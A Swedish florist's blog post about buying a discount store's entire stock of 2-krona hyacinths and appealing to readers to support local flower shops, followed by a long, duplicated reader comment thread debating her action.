En vädjan från mig som florist! Tycker DU att det är okay att handla dina sorgbinderier på ICA om du har förlorat någon i din närhet? Är det okay att köpa en häck buske på varuhus som inte jobbar med blommor?!

image

Hej vännen! Som ni kunde se i mitt förra inlägg så har vi precis kommit hem ifrån en fantastisk helg i Stockholm. jag väckte Ludvig och bar ut honom i bilen och vi lämnade Vasastan strax innan 05:00. Jag kände mig frusen och febrig så både jag & Lilleman åkte i pyjamas. Under dagen blev jag sämre, fick feber och känner mig riktigt kass =( Jag behöll därför pyjamasen på och jobbade ”bakom” i butiken 😉

Jag hade lovat Ludvig att klä julgranen och kom på att jag inte har någon ljus-slinga. Så efter jobbet körde jag bort till Ö&B (4min från min butik)

Jag möttes då utav detta:

image

Jag blir sååååååå jävla förbannad! Alltså jag är helt medveten om att det är fri konkurrens, och tycker att konkurrensär ÄR bra! Det höjer ofta marknads intresset! 

– Men hallå?! 2kr?! Det finns inte någon odlare som kan odla, plocka, plantera ner löken i plastkrukan OCH sätta på en barcode för 2kr! Omööööööjligt!

En utav mina trogna stamkunder var i full gång med att lasta korgen full med hyacinter, hon gick fram till mig och bad om ursäkt för att hon är ”otrogen” emot mig. Jag kramar om henne och säger att hon absolut inte behöver känna så och att det är en fantastisk vara för dom pengarna och att jag själv aldrig skulle kunna sälja dom för detta Priset….

Jag har under mina snart 8år som egenföretagare alltid valt att bara fokusera på mitt företag och min butik istället för att fokusera på alla andra. Jag har också under dessa år varit med om x-antal påhopp, anklagelser, anmälningar osv utav lokala konkurenter, lokala grossister osv… jag har ALDRIG bemött dessa utan stått fast vid mitt motto:

-sköt dig själv och skit i alla andra! 

’Om det tex öppnar en ny butik i närheten, varför lägga fokus på vad ”den andra”  butiken gör/erbjuder. Tvärt om! Mer fokus på min egna butik,  skapa kund event, ta ett pepp talk med personalen om hur viktigt det är med servicemindheten, stå på tårna, var uppdaterad på det senaste, skapa bra erbjudanden och istället göra allt för att våran egna butik ska vara så bra den bara kan bli, på ALLA plan. -Det är viktigast för mig!

Jag driver en blomsterbutik/handelsträdgård och jobbar med svenska, tyska och Holländska odlare. Även inköp via dom Holländska auktionerna. Kvaliteten & servicen är det som alltid kommer i första hand. jag försöker att vara konkuranskraftig med priserna och erbjuder alltid riktigt bra kvalitetsvaror till bra priser.  -Men detta kan jag inte jämföra mig med, helt omöjligt =(

image

som ni kan se så står Ö&B och säljer hyacinter för 2kr. Detta är alltså inkl moms! Är det något fel på hyacinterna? nej…. jätte fina plantor med kraftiga lökar. Ingen andra sortering! Jag blev så sur och stött över detta att jag bara köpte min ljusslinga och åkte därifrån. MEN jag vände bilen och körde tillbaka…..  Jag köper själv in mina hyacinter för 4.25 PLUS moms. OM man köper större mängder så kan man ibland lyckas köpa in dom för 3,75:- PLUS moms. Vi står och tar 10:- i butiken till kund. Då ska ni också veta att vi även ska betala för transport och vara förberedde på eventuellt svin. Inte några jätte marginaler direkt. OM man vill kan man köpa in andra sorterings hyacinter för ca 2,50 plus moms. Men det är och har aldrig varit en alternativ för My’s Blommor! -Vad gör jag? 

Jo, jag går fram till den trevliga tjejen i kassan och frågar lite försynt om hon har fler hyacinter på lager. Hon tittar lite frågande på mig och vagnen som står framme i butiken. Efter ett samtal till lagret och en sammanställning utav hur mycket som finns så förklarar jag att gärna skulle vilja köpa ALLT dom har. (jag hade nämligen observerat att dom i sitt annons blad inte hade skrivit i något max-antal)

image

Sagt och gjort jag lämnar Ö&B med ALLA deras hyacinter.  Rätt eller fel? -jag vet faktiskt inte…… Men jag köper in dom för under halva mitt inköps pris, samtidigt som jag förhindrar att Ö&B kan sälja dom för 2:- och då totalt stoppar min egen försäljning utav hyacinter……. 

Jag måste erkänna att det ÄR extremt tuff och hård konkurrens. Idag säljer var och varannan mathandelsbutik blommor, många stora koncerner, hoppar också på trenden att fånga upp alla våra storhelger och då locka in kunder med blommor/växter till sjukt låga priser. Varierad kvalitet förvisso. Men det som skrämmer mig är, hur ska detta sluta? Vi står i våran butik och erbjuder en kunskap och djup specialicering inom alla kategorier så som sorgbinderi, bröllop, trädgård, häckplantering osv…..

Vi erbjuder ett bas sortiment men också ett genuint hantverk som vi florister kan erbjuda. Samtidigt så börjar den ena ICA butiken efter den andra att erbjuda begravnings binderier till sina kunder? Helt sjukt enligt mig! Om en närstående till mig har gått bort så skulle jag ALDRIG i min vildaste fantasi få för mig att gå in på ica och samtidigt som som jag shoppar mat & hygien artiklar beställa en begravningskrans! Eller samtidigt som jag ber expediten som står bakom charken att skära upp extra tunna kalkon-skivor för att sedan lägga till, -jag skulle gärna vilja ha en begravnings krans också!

Usch! detta är verkligen svårt! Jag förstår att man som kund är prismedveten och håller hårt i sina pengar. men fortsätter det såhär så kommer fler och fler butiker upphöra, lägga ner och tyvärr gå i konkurs. 

Nåja…. det är helt och hållet upp till kunden att avgöra. MEN jag vädjar som florist och  talar för många utav mina bransch kollegor när jag säjer: Snälla rara söta ni, vill ni behålla eran lokala blomsterbutik, ha möjligheten att få en service ifrån välutbildade florister, trädgårdsarkitekter osv….  så bör man också gynna sin egna lokala butik i den mån man kan!  Det ligger trots allt i konsumentens intresse att måna om dom butiker man vill ha kvar, konsumenten gör alltid ett val & har därmed ett ansvar också….. Tyvärr är det väl så som det gamla klassiska uttrycket säger, -man saknar kossan när båset är tomt! 

 

image

 

Även lilleman var dressad i pyamas heeeela dagen…. ibland blir det så 😉 hehe!

image

image

image

Hyacinte är för övrigt en blomma som jag verkligen älskar. Kombinationen är oändlig & det är bara fantasin som sätter gränserna…..

Jag vet egentligen inte vad jag ville få sagt med detta inlägget……. Jag har bara fått mig en extrem tankeställare! Skriv gärna ett par rader och berätta DIN syn på det…… väldigt intressant!

 

Jag skulle bli otroligt tacksam om du DELADE detta inlägget då jag vill ha in så många åsikter som möjligt. Tack på förhand 🙂

ha en fantastisk dag! /Kramar My Martens

 

image

147 Komentarer

 1. Du är verkligen en riktig affärkvinna du ? Det tråkiga är väl bara att Ö&B får hem nya o fortsätter sin försäljning. Personligen älskar jag blomsteraffärer och all inspiration dom ger o oftast är kvaliten mycket bättre men visst slinker det ner lite hyacinter o rosor från ica ibland, dock är det ju mer spontanköp då när man ändå handlar mat. Dock skulle jag aldrig köpa begravningskrans på Ica!
  Hoppas du kryar på dig snabbt!
  Kram

 2. Du är verkligen en riktig affärkvinna du 🙂 Det tråkiga är väl bara att Ö&B får hem nya o fortsätter sin försäljning. Personligen älskar jag blomsteraffärer och all inspiration dom ger o oftast är kvaliten mycket bättre men visst slinker det ner lite hyacinter o rosor från ica ibland, dock är det ju mer spontanköp då när man ändå handlar mat. Dock skulle jag aldrig köpa begravningskrans på Ica!
  Hoppas du kryar på dig snabbt!
  Kram

 3. Jag kan köpa några rosor eller någon blomma på Ica men skulle aldrig köpa begravningsblommor där!!
  Går jag in i en blomsteraffär vill jag köpa ALLT, det är ju sååå mycket fint och massa arrangemang som jag skulle vilja ha hemma så det blir oftast dubbelt så dyrt som det skulle ? Men jag älskar blomsteraffärer som har lite småpill i butiken med ?
  http://lotte4.blogspot.com

 4. Jag kan köpa några rosor eller någon blomma på Ica men skulle aldrig köpa begravningsblommor där!!
  Går jag in i en blomsteraffär vill jag köpa ALLT, det är ju sååå mycket fint och massa arrangemang som jag skulle vilja ha hemma så det blir oftast dubbelt så dyrt som det skulle 😉 Men jag älskar blomsteraffärer som har lite småpill i butiken med 😀
  https://lotte4.blogspot.com

 5. Ha ha! Du är underbar! Vilken företagsamhet! Jag vill också gärna köpa allting så billigt som möjligt… inom rimliga gränser. Men jag vill ännu hellre ha kvar specialbutiker, där det finns en kunskap bakom varan som säljs. Jag tycker inte om den utveckling som är just nu; att handla billigt på nätet t ex. Jag vill kunna känna, lukta, klämma på varan och prata med en kunnig person ”bakom disken”. Stå på dig! Din affär verkar jättefin. Nästa gång jag kommer till Öland måste jag nog komma förbi.
  God jul till dig och din lilleman!

 6. Ha ha! Du är underbar! Vilken företagsamhet! Jag vill också gärna köpa allting så billigt som möjligt… inom rimliga gränser. Men jag vill ännu hellre ha kvar specialbutiker, där det finns en kunskap bakom varan som säljs. Jag tycker inte om den utveckling som är just nu; att handla billigt på nätet t ex. Jag vill kunna känna, lukta, klämma på varan och prata med en kunnig person ”bakom disken”. Stå på dig! Din affär verkar jättefin. Nästa gång jag kommer till Öland måste jag nog komma förbi.
  God jul till dig och din lilleman!

 7. Vilken energi ?
  Om du tar en tia för en hyacint så är det ju ett jättebra pris, det lät billigt i mina öron!
  Jag köper en del blandat, min brudbukett håller fortfarande formen, och det är tio år sen jag gav 1400 kr för den. Man får ju vad man betalar för…
  Vår närmsta blomsteraffär stängde ner för et år sen, jättesynd ?

 8. Vilken energi 🙂

  Om du tar en tia för en hyacint så är det ju ett jättebra pris, det lät billigt i mina öron!

  Jag köper en del blandat, min brudbukett håller fortfarande formen, och det är tio år sen jag gav 1400 kr för den. Man får ju vad man betalar för…
  Vår närmsta blomsteraffär stängde ner för et år sen, jättesynd 🙁

 9. Ja, det är helt okej att mätta magen efter matsäcken. Sanningen är ju att Ö&B o dy. Kan konkurrera med billigare pris och om dom även utökar sitt utbud med olika ihopsättningar är det ju i slutändan bara priset som är skillnaden…

 10. Ja, det är helt okej att mätta magen efter matsäcken. Sanningen är ju att Ö&B o dy. Kan konkurrera med billigare pris och om dom även utökar sitt utbud med olika ihopsättningar är det ju i slutändan bara priset som är skillnaden…

 11. Haha, så härlig du är <3 Jag köper mina blomster hos en lokal blomster handlare som jag älskar ? Så grymt fina blomster och arrangemang. Är ju en del av upplevelsen att få gå där inne och strosa och titta och drömma. Betalar gärna någon krona extra då ?
  Och 10 kr är ett bra pris tycker jag. Kram på dig

 12. jag vet själv precis hur det är med den tuffa konkurrensen från stora livsmedelsjättar. Jag hade själv butik på Ölands köpstad förut och när Ica började ta in samma inredningvaror som oss så var det kört. Har andra vänner som är florister och de säger samma som du, köp blommorna i en blomsteraffär! Och det tänker jag fortsätta med, för att gynna den lokala handeln! Heja dig My!

 13. Haha, så härlig du är <3 Jag köper mina blomster hos en lokal blomster handlare som jag älskar 🙂 Så grymt fina blomster och arrangemang. Är ju en del av upplevelsen att få gå där inne och strosa och titta och drömma. Betalar gärna någon krona extra då 😉
  Och 10 kr är ett bra pris tycker jag. Kram på dig

 14. jag vet själv precis hur det är med den tuffa konkurrensen från stora livsmedelsjättar. Jag hade själv butik på Ölands köpstad förut och när Ica började ta in samma inredningvaror som oss så var det kört. Har andra vänner som är florister och de säger samma som du, köp blommorna i en blomsteraffär! Och det tänker jag fortsätta med, för att gynna den lokala handeln! Heja dig My!

 15. Jag skulle aldrig handla bröllops/begravining/dop dyl på Ica men andra växer/blommor handlas där bara för att jag åker inte många km extra bara för att köpa hos en florist.. Jag är urkast på att sköta blommor/växter så jag passar alltid på och norpa skott hor min gamla mormor hemma i Småland när jag hälsar på om somrarna.
  Just detta är ju lite intressant för Ö&B har väl inget bonus system men Ica har ju det. Ju mer du handlar ju mer bonus får du på ica..

  • Hej Kinna! Vi har inte kläder i butilen nu, vi tar in det säsongsvis dvs sommartid… Skillnad i mina ögon är att det krävs inte någon specialiserad utbildning för att sälja kläder.. Det vi blomsterbutiker kan erbjuda iform utav floristiskt hantverk, trädgårds specialisering, sorgbinderi teknik, samt sorg hantering och brudbinderier.. Vilket man inte kan förväna sig hos tex ICA, Ö&B, Bauhaus osv… Jag vet om att det är fri konkursens och tycker till viss mån att det är bra då det ökar marknads intresset… MEN konsumenten har ett visst ansvar, vill man som konsument ha möjligheten att få den hjälpen och servicen (ovasett bransch) i vårat fall floristiken, så behöver man måna om dom lokala blomsterbutikerna, i annat fall kommer vi att falla bort… Kvar står dom stora koncernerna, då som först saknar konsumenterna våran kunskap & teknik…. Förra året gick 72 blomsterbutiker i konkurs, jag själv som även jobbar som grossist är mer än insatt i detta…. Lite sorgligt, men samtidigt en konstaterande faktum vad som håller på att hända med handeln…. Rätt eller fel…. Det ligger ganska mycket i det jag skriver…. Kram

   • Intressant.. Jag jobbar i en ICA-butik och vi säljer väldigt lite blommor. Vi har tulpaner och rosor, hyacinter och julstjärnor vid jul. Det här kan man diskutera i oändlighet. Jag vill börja med att säga att du menar på att man inte behöver utbildning för att sälja kläder. Det låter urkonstigt i mina öron. Vill jag köpa ett klädesplagg så vill jag ha kunnig personal som VET (Inte bara tycker) hur plagget skall sitta, vilken storlek, mönster, färg osv som passar min kropp, hårfärg osv. Det är som många andra skriver. Ska man ”bara” köpa tulpaner så kan man lika gärna köpa det på ICA när man ändå är där för att handla annat. För att slippa åka till ytterligare ett ställe. En annan skrev att man får ju bonus på allt man handlar på ICA, så ja du får bonus även på dina blommor. Många gånger (iaf där jag bor) så har blomsteraffären exakt likadana tulpaner från samma märke för 10-20 kronor mer. Jag kanske då känner att jag inte behöver/vill ha någon experthjälp då jag ”bara” skall köpa tulpaner. Då kan jag lika gärna plocka en bunt på ICA. Att folk skulle handla begravning/bröllop/dopbinderier i en ICA-butik tror jag absolut inte.
    Förstår att du älskar din butik och att du säkert har mååånga trogna och nya kunder. Men det är 2014 nu och allt nu för tiden skall gå så himla lätt och smidigt så då vill folk ha allt samlat på samma ställe. Människor är så stressade idag. Lycka till med din butik ? Kram

  • ett litet tillägg Kinna, är ju också prisfrågan, som i detta fallet var långt under odlarens uppdrivningskostnad….. Inte bara konkuransen i sig. tex, om Hm säljer ett bas linne för 59:- och sedan säljer jag samma linne för 11:80:- Vilket motsvarar samma pris skillnad som exemplet som jag tog =) Det skulle innebära att det inte ens skulle vara fabrikskostnaden för linnet……

 16. fy fan vad du är cool, det trodde inte jag om dig. Du ser så snäll och oskyldig ut (inget illa menat) men här tar du ett stort kliv fram och är värsta tuffingen. Bra gjort, mycket bra gjort tycker jag!! heja dig finis.

 17. Jag skulle aldrig handla bröllops/begravining/dop dyl på Ica men andra växer/blommor handlas där bara för att jag åker inte många km extra bara för att köpa hos en florist.. Jag är urkast på att sköta blommor/växter så jag passar alltid på och norpa skott hor min gamla mormor hemma i Småland när jag hälsar på om somrarna.

  Just detta är ju lite intressant för Ö&B har väl inget bonus system men Ica har ju det. Ju mer du handlar ju mer bonus får du på ica..

  • Hej Kinna! Vi har inte kläder i butilen nu, vi tar in det säsongsvis dvs sommartid… Skillnad i mina ögon är att det krävs inte någon specialiserad utbildning för att sälja kläder.. Det vi blomsterbutiker kan erbjuda iform utav floristiskt hantverk, trädgårds specialisering, sorgbinderi teknik, samt sorg hantering och brudbinderier.. Vilket man inte kan förväna sig hos tex ICA, Ö&B, Bauhaus osv… Jag vet om att det är fri konkursens och tycker till viss mån att det är bra då det ökar marknads intresset… MEN konsumenten har ett visst ansvar, vill man som konsument ha möjligheten att få den hjälpen och servicen (ovasett bransch) i vårat fall floristiken, så behöver man måna om dom lokala blomsterbutikerna, i annat fall kommer vi att falla bort… Kvar står dom stora koncernerna, då som först saknar konsumenterna våran kunskap & teknik…. Förra året gick 72 blomsterbutiker i konkurs, jag själv som även jobbar som grossist är mer än insatt i detta…. Lite sorgligt, men samtidigt en konstaterande faktum vad som håller på att hända med handeln…. Rätt eller fel…. Det ligger ganska mycket i det jag skriver…. Kram

   • Intressant.. Jag jobbar i en ICA-butik och vi säljer väldigt lite blommor. Vi har tulpaner och rosor, hyacinter och julstjärnor vid jul. Det här kan man diskutera i oändlighet. Jag vill börja med att säga att du menar på att man inte behöver utbildning för att sälja kläder. Det låter urkonstigt i mina öron. Vill jag köpa ett klädesplagg så vill jag ha kunnig personal som VET (Inte bara tycker) hur plagget skall sitta, vilken storlek, mönster, färg osv som passar min kropp, hårfärg osv. Det är som många andra skriver. Ska man ”bara” köpa tulpaner så kan man lika gärna köpa det på ICA när man ändå är där för att handla annat. För att slippa åka till ytterligare ett ställe. En annan skrev att man får ju bonus på allt man handlar på ICA, så ja du får bonus även på dina blommor. Många gånger (iaf där jag bor) så har blomsteraffären exakt likadana tulpaner från samma märke för 10-20 kronor mer. Jag kanske då känner att jag inte behöver/vill ha någon experthjälp då jag ”bara” skall köpa tulpaner. Då kan jag lika gärna plocka en bunt på ICA. Att folk skulle handla begravning/bröllop/dopbinderier i en ICA-butik tror jag absolut inte.
    Förstår att du älskar din butik och att du säkert har mååånga trogna och nya kunder. Men det är 2014 nu och allt nu för tiden skall gå så himla lätt och smidigt så då vill folk ha allt samlat på samma ställe. Människor är så stressade idag. Lycka till med din butik 🙂 Kram

  • ett litet tillägg Kinna, är ju också prisfrågan, som i detta fallet var långt under odlarens uppdrivningskostnad….. Inte bara konkuransen i sig. tex, om Hm säljer ett bas linne för 59:- och sedan säljer jag samma linne för 11:80:- Vilket motsvarar samma pris skillnad som exemplet som jag tog =) Det skulle innebära att det inte ens skulle vara fabrikskostnaden för linnet……

 18. fy fan vad du är cool, det trodde inte jag om dig. Du ser så snäll och oskyldig ut (inget illa menat) men här tar du ett stort kliv fram och är värsta tuffingen. Bra gjort, mycket bra gjort tycker jag!! heja dig finis.

 19. Hej My!
  Tyvärr har två blomsterbutiken försvunnit från min gatan, är nu tvunget att köpa mina blommor på ICA. Det finns butiker längre bort, men jag äger ingen bil längre och att gå är för långt!
  Tycker du är en duktig tös, du har nog sinne för affärer, lycka till med allt!

 20. Hej My!
  Tyvärr har två blomsterbutiken försvunnit från min gatan, är nu tvunget att köpa mina blommor på ICA. Det finns butiker längre bort, men jag äger ingen bil längre och att gå är för långt!
  Tycker du är en duktig tös, du har nog sinne för affärer, lycka till med allt!

 21. rent principellt kan jag tycka det är småsint att
  1- göra ett aktivt val åt andra kunder, så att dessa inte KAN köpa billiga blommor.
  2- du valde ironiskt nog själv att svänga in på ÖB för att köpa en billig ljusslinga som sannolikt finns till dubbla priset i en liten när-ägd elaffär, som inte heller de kan konkurrera genom att köpa enorma volymer.

  • Jag gjorde absolut ett aktivt val då jag köpte ALLS hyacinter….
   Av olika anledningar, bl.a. Att våran egna försäljning totalt stannade av utav just hyacinter. Bl.a. Att 2kr inte täcker en bråkdel utav kostnaden hos odlaren…. Principen i dig med andra ord ?
   Gällande min ljusslinga så handlar det inte om priset, utan smidigheten få det ligget 4min ifrån min egen butik. Jag är oftas mer praktisk än ekonomisk, då jag alltid handlar på det närmaste hållet, typ Statoil, närmaste, minsta & den dyraste Ica butiken… Tex.. Jag vill bara poängtera att det ör helt ok med prisskillnader men inte under tillverknings/odlar kostnaderna… Det förstör gör så några led, odlare, butik, och i slutändan även konsumenten….. Ha en fin kväll Johan . Mvh My

   • Vad gäller sorgbinderi,
    jag har själv inte varit i kontakt med icas sorgblomster men spontant känns det som att ica, lika väl kan ha knutit kompetenta florister till sig, som ica kanske t.o.m själv har anställt på heltidstjänst för att förse ett visst antal butiker. Det skulle ju innebära att varken kvaliteten eller hantverket på något sätt är sämre för att det är ica. Detta är rent hypotetiskt, jag vet som sagt inget om deras floriströrelse.

    • Jag håller med Johan här! Ser också din bekvämlighet med att handla din ljusslinga på närmaste butik som lite samma sak. Dubbelmoral här.
     Sen är det ju märkligt att sälja så billigt att det inte ens produktionskostnaden täcks. Lägger dock starkt märke till dubbelmoralen i det du skriver.

  • Tänkte precis som du. Det var tom det första jag tänkte, att hoki första meningen skriver att hon svängde in på ÖB för att handla en billig ljusslinga när det finns el-butiker/lamp-affärer som går under pga ställen som ÖB.

 22. rent principellt kan jag tycka det är småsint att
  1- göra ett aktivt val åt andra kunder, så att dessa inte KAN köpa billiga blommor.
  2- du valde ironiskt nog själv att svänga in på ÖB för att köpa en billig ljusslinga som sannolikt finns till dubbla priset i en liten när-ägd elaffär, som inte heller de kan konkurrera genom att köpa enorma volymer.

  • Jag gjorde absolut ett aktivt val då jag köpte ALLS hyacinter….

   Av olika anledningar, bl.a. Att våran egna försäljning totalt stannade av utav just hyacinter. Bl.a. Att 2kr inte täcker en bråkdel utav kostnaden hos odlaren…. Principen i dig med andra ord 😉
   Gällande min ljusslinga så handlar det inte om priset, utan smidigheten få det ligget 4min ifrån min egen butik. Jag är oftas mer praktisk än ekonomisk, då jag alltid handlar på det närmaste hållet, typ Statoil, närmaste, minsta & den dyraste Ica butiken… Tex.. Jag vill bara poängtera att det ör helt ok med prisskillnader men inte under tillverknings/odlar kostnaderna… Det förstör gör så några led, odlare, butik, och i slutändan även konsumenten….. Ha en fin kväll Johan . Mvh My

   • Vad gäller sorgbinderi,
    jag har själv inte varit i kontakt med icas sorgblomster men spontant känns det som att ica, lika väl kan ha knutit kompetenta florister till sig, som ica kanske t.o.m själv har anställt på heltidstjänst för att förse ett visst antal butiker. Det skulle ju innebära att varken kvaliteten eller hantverket på något sätt är sämre för att det är ica. Detta är rent hypotetiskt, jag vet som sagt inget om deras floriströrelse.

    • Jag håller med Johan här! Ser också din bekvämlighet med att handla din ljusslinga på närmaste butik som lite samma sak. Dubbelmoral här.
     Sen är det ju märkligt att sälja så billigt att det inte ens produktionskostnaden täcks. Lägger dock starkt märke till dubbelmoralen i det du skriver.

  • Tänkte precis som du. Det var tom det första jag tänkte, att hoki första meningen skriver att hon svängde in på ÖB för att handla en billig ljusslinga när det finns el-butiker/lamp-affärer som går under pga ställen som ÖB.

 23. Haha förstår dig helt ?
  Det är lite som i vår bransch Tatuering!
  Här står vi och utför våra snygga konstverk men helt plötsligt har det börjat blomma ut en massa oseriösa hemma tatuerare som konkurrera ut alla studio :/
  En tatuering som vi oftast tar 1000kr för sitter de hemma och gör för 200kr
  Ja samma sak här undrar jag, hur i helvete är det möjligt med dessa priser!!!
  Man ska betala moms,skatt,hyra,material m.m.
  Sen kan jag inte fatta hur man kan vara så dum att man ens utför en sådan sak hemma på köksbordet hos en kompis kompis!!!
  Skulle du åka till sjukhus eller en kompis kompis om du skulle operera bort blindtarm liksom….

 24. Haha förstår dig helt 🙂
  Det är lite som i vår bransch Tatuering!
  Här står vi och utför våra snygga konstverk men helt plötsligt har det börjat blomma ut en massa oseriösa hemma tatuerare som konkurrera ut alla studio :/
  En tatuering som vi oftast tar 1000kr för sitter de hemma och gör för 200kr
  Ja samma sak här undrar jag, hur i helvete är det möjligt med dessa priser!!!
  Man ska betala moms,skatt,hyra,material m.m.
  Sen kan jag inte fatta hur man kan vara så dum att man ens utför en sådan sak hemma på köksbordet hos en kompis kompis!!!
  Skulle du åka till sjukhus eller en kompis kompis om du skulle operera bort blindtarm liksom….

 25. FYTUSAN vad häftig du är! WOW alltså, helt otroligt!
  Jag har vart med om att det kommer in en kund och frågar om vi har (kommer inte ihåg vilken blomma) och vi säger trevligt ”Ja, det har vi.” kunden frågar tillbaka vad den kostar och när vi säger priset så fnyser han och vresigt säger tillbaka att dom tar ”blablabla” kr på ICA. Trevligt säger vi att ”Förmodligen är kvalitén sämre på ICA.
  Jag tycker det är skamligt att mataffärer säljer blommor och blomsteraffärerna får ta skiten sedan. Usch på folk som faktiskt slösar sina pengar på sämre växter som dom förmodligen kommer att få köpa fler av i längden än om dom lagt på en 10:a och fått en växt som klarat sig längre! ?

 26. det var antagligen ett sk. ”lockpris” och det gör nog ingen vinst på själva hyacinten över huvudtaget! Men det drar nig lite folk som köper på sig annat smått och gottnör de är där.. Vet att vissa blomsterbutiker kör med sådana rajder också då och då ?

 27. FYTUSAN vad häftig du är! WOW alltså, helt otroligt!
  Jag har vart med om att det kommer in en kund och frågar om vi har (kommer inte ihåg vilken blomma) och vi säger trevligt ”Ja, det har vi.” kunden frågar tillbaka vad den kostar och när vi säger priset så fnyser han och vresigt säger tillbaka att dom tar ”blablabla” kr på ICA. Trevligt säger vi att ”Förmodligen är kvalitén sämre på ICA.

  Jag tycker det är skamligt att mataffärer säljer blommor och blomsteraffärerna får ta skiten sedan. Usch på folk som faktiskt slösar sina pengar på sämre växter som dom förmodligen kommer att få köpa fler av i längden än om dom lagt på en 10:a och fått en växt som klarat sig längre! 🙂

 28. Hej!
  Jag förstår din tanke med ditt inlägg och ditt agerande, men du är en hemsk person! Varför köpa alla?? Tänk om de finns någon annan som också ville köpa några billigt, men nu måste man gå till din affär och köpa dem dyrare. varför ska du vara så självisk!?

 29. det var antagligen ett sk. ”lockpris” och det gör nog ingen vinst på själva hyacinten över huvudtaget! Men det drar nig lite folk som köper på sig annat smått och gottnör de är där.. Vet att vissa blomsterbutiker kör med sådana rajder också då och då 🙂

 30. Hej!
  Jag förstår din tanke med ditt inlägg och ditt agerande, men du är en hemsk person! Varför köpa alla?? Tänk om de finns någon annan som också ville köpa några billigt, men nu måste man gå till din affär och köpa dem dyrare. varför ska du vara så självisk!?

 31. Hej! Har själv haft butik i 14 år. Visst blir man tokig när förutsättningarna inte är någorlunda lika för alla som inköpare…. Jag håller med dig fullständigt! Något som många glömmer är att våran kunskap och hantverk är också också en konstnärlig förmåga. En hantverkare o konstnär kostar, men floristerna ska vara billiga nästan gratis. Sätt på hantverksklockan på 250kr per timme när kunden kommer in o börjar beställa, som en annan snickare eller elektriker, då kan vi börja snacka priser….. Floristyrket är tyvärr ganska
  Underskattat. Mycket pg.a billighetskedjor och våra matvaruledjor…..Heja dej!!!! Bra gjort!! Hoppas på bra julförsäljning till dig i din butik! Trevliga helger önskas till dig o lilleman!!!!!!! God jul

 32. Hej! Har själv haft butik i 14 år. Visst blir man tokig när förutsättningarna inte är någorlunda lika för alla som inköpare…. Jag håller med dig fullständigt! Något som många glömmer är att våran kunskap och hantverk är också också en konstnärlig förmåga. En hantverkare o konstnär kostar, men floristerna ska vara billiga nästan gratis. Sätt på hantverksklockan på 250kr per timme när kunden kommer in o börjar beställa, som en annan snickare eller elektriker, då kan vi börja snacka priser….. Floristyrket är tyvärr ganska
  Underskattat. Mycket pg.a billighetskedjor och våra matvaruledjor…..Heja dej!!!! Bra gjort!! Hoppas på bra julförsäljning till dig i din butik! Trevliga helger önskas till dig o lilleman!!!!!!! God jul

 33. -Jag tycker du har all rätt att köpa alla dessa hyacinter för att sen sälja dyrare
  -Jag tycker kunder har all rätt att köpa sina blommor vart de vill till vilket pris de vill.
  -Jag tycker det är synd om små specialiserade detaljhandlare som har det svårt i konkurrensen.
  -Jag ser ingen skillnad i kvalitet på blommor köpta på öob eller hos dig men det beror på min okunskap. Dessutom tyckte du ju själv lökarna var så fina att du själv ville ha dem. Så att köpa fina blommor till jättebilligt pris är ju så bra det kan bli.
  Summa summarum från min sida blev väl att man kan sköta sig själv och skita i andra. Du försöker skuldbelägga alla som inte köper hos detaljhandel när du som någon påpekade gör exakt samma sak själv (med ljusslingan). Så när du köper alla hyacinter gör du rätt, då tänker du likadant som vi kunder, att köpa ok/bra varor till bästa pris.

 34. Jag förstår att det måste kännas riktigt surt när allt fler butiker börjar erbjuda samma saker som en blomsterbutik gör… :/ Men sedan anser jag också att blommor är till för alla människor, eftersom de skänker så mycket glädje, och det finns ju massor med människor som har det riktigt dåligt med pengar. Om dessa människor kanske har två kronor över att kunna lägga på en hyacint från ÖoB så tycker jag att den möjligheten borde finnas! Inte helt rätt kan jag tycka att köpa upp alla hyacinter från ÖoB för att sedan sälja de dyrare…!? Samtidigt som jag har full förståelse för ditt synsätt!
  Jag är utbildad florist men arbetar inte som det, men min bästa vän är florist och har tävlat inom yrket (och vunnit florist SM!) och är butikschef i en blomsterbutik som nu håller på att gå i konkurs för att de inte kan konkurrera med stormarknaden i närheten som säljer väldigt mycket och fina blommor. Jag verkligen lider med alla florister som knappt får det att gå runt i deras butiker… Jag förstår att inte du hade kunnat tänka dig att köpa begravningsbinderi ICA-butik eller liknande, och det är det nog många som inte vill… Men helt ärligt blir man ju halvt ruinerad vid en begravning eftersom det är så mycket saker som kostar pengar, och vad spelar det då för roll egentligen om man köper blommor från ICA där man kanske har råd med de blommor man vill ha till begravningen? För det är ju samma sak där, alla människor har inte råd med blommor från en florist.. Och ska man hellre låta bli att ha blommor till begravningen då?
  Jag inser att jag låter lite anklagande i min kommentar, haha, vilket inte egentligen är meningen! men jag blir bara så engagerad i den här frågan eftersom jag har sett hur svårt många människor har det ekonomiskt och hur glada de blir av att kunna köpa en liten blomma till hemmet ? Men jag är väldigt kluven i frågan också, för det ÄR tråkigt om hantverket försvinner…

 35. -Jag tycker du har all rätt att köpa alla dessa hyacinter för att sen sälja dyrare
  -Jag tycker kunder har all rätt att köpa sina blommor vart de vill till vilket pris de vill.
  -Jag tycker det är synd om små specialiserade detaljhandlare som har det svårt i konkurrensen.
  -Jag ser ingen skillnad i kvalitet på blommor köpta på öob eller hos dig men det beror på min okunskap. Dessutom tyckte du ju själv lökarna var så fina att du själv ville ha dem. Så att köpa fina blommor till jättebilligt pris är ju så bra det kan bli.

  Summa summarum från min sida blev väl att man kan sköta sig själv och skita i andra. Du försöker skuldbelägga alla som inte köper hos detaljhandel när du som någon påpekade gör exakt samma sak själv (med ljusslingan). Så när du köper alla hyacinter gör du rätt, då tänker du likadant som vi kunder, att köpa ok/bra varor till bästa pris.

 36. Jag förstår att det måste kännas riktigt surt när allt fler butiker börjar erbjuda samma saker som en blomsterbutik gör… :/ Men sedan anser jag också att blommor är till för alla människor, eftersom de skänker så mycket glädje, och det finns ju massor med människor som har det riktigt dåligt med pengar. Om dessa människor kanske har två kronor över att kunna lägga på en hyacint från ÖoB så tycker jag att den möjligheten borde finnas! Inte helt rätt kan jag tycka att köpa upp alla hyacinter från ÖoB för att sedan sälja de dyrare…!? Samtidigt som jag har full förståelse för ditt synsätt!

